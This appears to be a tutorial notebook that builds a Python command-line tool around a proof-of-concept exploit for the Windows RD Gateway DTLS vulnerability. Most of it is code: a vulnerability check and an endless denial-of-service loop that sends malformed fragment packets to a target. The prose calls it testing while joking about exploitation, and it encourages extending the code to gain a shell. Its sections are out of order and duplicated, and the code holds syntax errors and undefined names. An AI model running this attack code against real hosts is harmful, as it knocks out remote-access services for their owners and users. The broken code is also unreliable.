Now Let's take this code and plug it into a command line wrapper. As this is a command line utility it will not work from the note book and you may need to run it from your local computer.

Let's have a look at the code once a pyCLI wrapper is added:

In [0]:
!pip install pyOpenSSL
# Importing the tools - Already you can research these to get an idea of use
import select  # I/O library 
import signal  # Most likely used in threading...
import socket  # Network sockets
import struct  # Useful for building network packets

from cryptography.hazmat.bindings.openssl.binding import Binding  # SSL libraries
from OpenSSL import SSL

TIMEOUT = 3  # Sets a Global timeout of 3 for operations

# We define a Custom Class of Packet to create a cast and make it easier to manipulate the packets
# to a template that we want
class Packet(object):

    # We create a custom __init__ or initiation method to set class variables
    # potentially different for each instance - prefixing a string with b gives us a `byte` type
    def __init__(self, fragment_id=0, no_of_fragments=1, fragment_length=0, fragment=b""):
        self.fragment_id     = fragment_id
        self.no_of_fragments = no_of_fragments
        self.fragment_length = fragment_length
        self.fragment        = fragment
        self.pkt_ID          = 5
        self.pkt_Len         = 0

    # We need to update the packet length to cause our DoS later
    def update_pkt_Len(self):
        self.pkt_Len = len(self.fragment) + 6

    # We override the `byte` class to cast our special packet
    def __bytes__(self):
        self.update_pkt_Len()

        buf  = b""
        buf += struct.pack("<HHHHH",
                            self.pkt_ID,
                            self.pkt_Len,
                            self.fragment_id,
                            self.no_of_fragments,
                            self.fragment_length)
        buf += self.fragment

        return buf

# We create a connection Class to better handle our connections
class Connection(object):

    # Another override of __init__ to set our needed variables
    # We assign default values and set our class up for the exploit
    def __init__(self, host=None, port=None, shouldConnect=True):
        self.host          = host
        self.port          = port
        self.shouldConnect = shouldConnect

        binding = Binding()
        binding.init_static_locks()
        SSL.Context._methods[0]= getattr(binding.lib, "DTLSv1_client_method")
        signal.signal(signal.SIGALRM, self.broken_connection)

        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.connection = SSL.Connection(SSL.Context(0), self.socket)

        if shouldConnect:
            self.connect()

    # A basic test for the connection to break
    def broken_connection(self, signum, frame):
        print("Connection not responding")
        try:
            self.close()
        except:
            quit('Connection not responding')

    # A basic test for the connection
    def connect(self):
        signal.alarm(TIMEOUT)
        try:
            self.connection.connect((self.host, self.port))
            self.connection.do_handshake()
        except SSL.SysCallError:
            quit("Could not connect to RD Gateway")
        signal.alarm(0)

    # The main DoS Function
    def send_dos_packet(self, id):
        packet = Packet(
            id, id, 1000, b"\x41"*1000
        )
        self.write(bytes(packet))

    # A test for Vulnerability - see the difference from above
    # Can you work out what we are doing differently?
    def is_vulnerable(self):
        print(f"Checking if {self.host} is vulnerable...")
        packet = Packet(
            0, 65, 1, b"\x00"
        )
        self.write(bytes(packet))
        ready = select.select([self.socket], [], [], TIMEOUT)
        if ready[0]:
            buf = self.read(16)
            return not (0x8000ffff == struct.unpack('<L', buf[-4:])[0])
        return True

    # Shut the connection down
    def close(self):
        self.connection.shutdown()

    # write to the connection
    def write(self, buffer):
        self.connection.send(buffer)

    # Read the connection
    def read(self, size):
        return self.connection.recv(size)

In [0]:
!pip install pyOpenSSL pycli
import select
import signal
import socket
import struct

from cryptography.hazmat.bindings.openssl.binding import Binding
from OpenSSL import SSL
from cli.log import LoggingApp

TIMEOUT = 3

class Packet:
    def __init__(self, fragment_id = 0, no_of_fragments = 1, fragment_length = 0, fragment = b""):
        self.fragment_id     = fragment_id
        self.no_of_fragments = no_of_fragments
        self.fragment_length = fragment_length
        self.fragment        = fragment
        self.pkt_ID          = 5
        self.pkt_Len         = 0

    def update_pkt_Len(self):
        self.pkt_Len = len(self.fragment) + 6

    def __bytes__(self):
        self.update_pkt_Len()

        buf  = b""
        buf += struct.pack("<HHHHH",
                            self.pkt_ID,
                            self.pkt_Len,
                            self.fragment_id,
                            self.no_of_fragments,
                            self.fragment_length)
        buf += self.fragment

        return buf

class Connection:
    def __init__(self, host = None, port = None, shouldConnect = True):
        self.host          = host
        self.port          = port
        self.shouldConnect = shouldConnect

        binding = Binding()
        binding.init_static_locks()
        SSL.Context._methods[0]= getattr(binding.lib, "DTLSv1_client_method")
        signal.signal(signal.SIGALRM, self.broken_connection)

        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.connection = SSL.Connection(SSL.Context(0), self.socket)

        if shouldConnect:
            self.connect()

    def broken_connection(self, signum, frame):
        self.log.error("Connection not responding")
        try:
            self.close()
        except:
            quit('Connection not responding')

    def connect(self):
        signal.alarm(TIMEOUT)
        try:
            self.connection.connect((self.host, self.port))
            self.connection.do_handshake()
        except SSL.SysCallError:
            quit("Could not connect to RD Gateway")
        signal.alarm(0)

    def send_dos_packet(self, id):
        packet = Packet(
            id, id, 1000, b"\x41"*1000
        )
        self.write(bytes(packet))

    def is_vulnerable(self):
        self.log.info(f"Checking if {self.host} is vulnerable...")
        packet = Packet(
            0, 65, 1, b"\x00"
        )
        self.write(bytes(packet))
        ready = select.select([self.socket], [], [], TIMEOUT)
        if ready[0]:
            buf = self.read(16)
            return not (0x8000ffff == struct.unpack('<L', buf[-4:])[0])
        return True

    def close(self):
        self.connection.shutdown()

    def write(self, buffer):
        self.connection.send(buffer)

    def read(self, size):
        return self.connection.recv(size)


class BlueGate(LoggingApp)

  def main():
    if self.params.mode == "check":
        connection = Connection(self.params.host, self.params.port)
        is_vulnerable = connection.is_vulnerable()

        if is_vulnerable:
            self.log.info("Host is vulnerable 🙀")
        else:
            self.log.error(bcolors.ERROR + "Host is not vulnerable 😺")
    if self.params.mode == "dos":
        self.log.info(bcolors.INFO + f"Sending DoS packets to {args.host}... 😹")
        i = 0
        while True:
            connection = Connection(args.host, args.port)
            for n in range(4):
                connection.send_dos_packet(i+n)
            i += 1

if __name__ == "__main__":
    app = BlueGate()
    app.add_param("-M", "--mode", choices=["check","dos"], required=True, type=str.lower, default=False, help="Mode")
    app.add_param("-P","--port", default=3391, help="UDP port of RDG, default: 3391", required=False, type=int)
    app.add_param("host", help="IP address of host")
    app.run()

#Attacking RDP

As part of recent research it was discovered that certain versions of These vulnerabilities allows an unauthenticated attacker to gain remote code execution with highest privileges via RD Gateway for RDP.

## What is RD Gateway?
RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet.

Let's have a look at the code and turn it into a command line tool that we can use to test our own security. 

Walk through it with the comments and let's understand what we are going to do with the variety of Python tools we are going to use to exploi... I mean test and study (this is for research purposes only!) our instances.

In [0]:
!pip install pyOpenSSL pycli
import select
import signal
import socket
import struct

from cryptography.hazmat.bindings.openssl.binding import Binding
from OpenSSL import SSL
from cli.log import LoggingApp

TIMEOUT = 3

class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

class Packet:
    def __init__(self, fragment_id = 0, no_of_fragments = 1, fragment_length = 0, fragment = b""):
        self.fragment_id     = fragment_id
        self.no_of_fragments = no_of_fragments
        self.fragment_length = fragment_length
        self.fragment        = fragment
        self.pkt_ID          = 5
        self.pkt_Len         = 0

    def update_pkt_Len(self):
        self.pkt_Len = len(self.fragment) + 6

    def __bytes__(self):
        self.update_pkt_Len()

        buf  = b""
        buf += struct.pack("<HHHHH",
                            self.pkt_ID,
                            self.pkt_Len,
                            self.fragment_id,
                            self.no_of_fragments,
                            self.fragment_length)
        buf += self.fragment

        return buf

class Connection:
    def __init__(self, host = None, port = None, shouldConnect = True):
        self.host          = host
        self.port          = port
        self.shouldConnect = shouldConnect

        binding = Binding()
        binding.init_static_locks()
        SSL.Context._methods[0]= getattr(binding.lib, "DTLSv1_client_method")
        signal.signal(signal.SIGALRM, self.broken_connection)

        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.connection = SSL.Connection(SSL.Context(0), self.socket)

        if shouldConnect:
            self.connect()

    def broken_connection(self, signum, frame):
        self.log.error(bcolor.WARNING +"Connection not responding" + bcolors.ENDC)
        try:
            self.close()
        except:
            quit(bcolor.OKGREEN + 'Connection not responding' + bcolors.ENDC)

    def connect(self):
        signal.alarm(TIMEOUT)
        try:
            self.connection.connect((self.host, self.port))
            self.connection.do_handshake()
        except SSL.SysCallError:
            quit(bcolor.WARNING + "Could not connect to RD Gateway" + bcolors.ENDC)
        signal.alarm(0)

    def send_dos_packet(self, id):
        packet = Packet(
            id, id, 1000, b"\x41"*1000
        )
        self.write(bytes(packet))

    def is_vulnerable(self):
        self.log.info(f"Checking if {self.host} is vulnerable...")
        packet = Packet(
            0, 65, 1, b"\x00"
        )
        self.write(bytes(packet))
        ready = select.select([self.socket], [], [], TIMEOUT)
        if ready[0]:
            buf = self.read(16)
            return not (0x8000ffff == struct.unpack('<L', buf[-4:])[0])
        return True

    def close(self):
        self.connection.shutdown()

    def write(self, buffer):
        self.connection.send(buffer)

    def read(self, size):
        return self.connection.recv(size)


class BlueGate(LoggingApp)

  def main(self):
    if self.params.mode == "check":
        connection = Connection(self.params.host, self.params.port)
        is_vulnerable = connection.is_vulnerable()

        if is_vulnerable:
            self.log.info(bcolors.INFO + "Host is vulnerable" + bcolors.ENDC + " 🙀")
        else:
            self.log.error(bcolors.ERROR + "Host is not vulnerable" + bcolors.ENDC + " 😺")
    if self.params.mode == "dos":
        self.log.info(bcolors.INFO + f"Sending DoS packets to {self.params.host}..." + bcolors.ENDC + " 😹")
        i = 0
        while True:
            connection = Connection(self.params.host, self.params.port)
            for n in range(4):
                connection.send_dos_packet(i+n)
            i += 1

if __name__ == "__main__":
    app = BlueGate()
    app.add_param("-M", "--mode", choices=["check","dos"], required=True, type=str.lower, default=False, help="Mode")
    app.add_param("-P","--port", default=3391, help="UDP port of RDG, default: 3391", required=False, type=int)
    app.add_param("host", help="IP address of host")
    app.run()

## Round Up!

Now we have a testing tool that we can use to test our own security and ensure that no one can run remote commands on our instances. If we do find a vunerable one, at least we can make some noise to our securities to highlight the possibilities...

See if you can update the code to find out more about this exploit.

- Add more output to the code, why not colour it? a list of colours can be found here: https://gist.github.com/vratiu/9780109
- Maybe add some Emoji's make it personal!
- We could use the cloud to create our own RDP server to test the script with - (consider using `boto3` if you have an AWS account)
- We could change the versions or create multiple and test against them
- ADVANCED - This PoC has the potential to be extended to run our own code. We could deploy a vulnerable instance and try and Pop a shell!

## Finishing the Tasks
Once you are comfortable editing the code you may imagine this script could be used as a shell to create other exploits as the emerge from research in the community and you would be correct! A lot of the code above is boiler plate for similar exploit PoCs (I just picked this one as it was modern).

Awesome! Now as it is a command line tool, it can look pretty boring :-(

  We can Jazz things up a little using colour (or color if you are American) codes to manipulate the text stream and change the code that is printed.

  Update your code to match the below adding in the `bcolors` class and updating the logging statements to see what happens! 

  You should notice the strings being printed in a different colour always end in `ENDC` or `'\033[0m'` as this value will reset the colour back to it's original.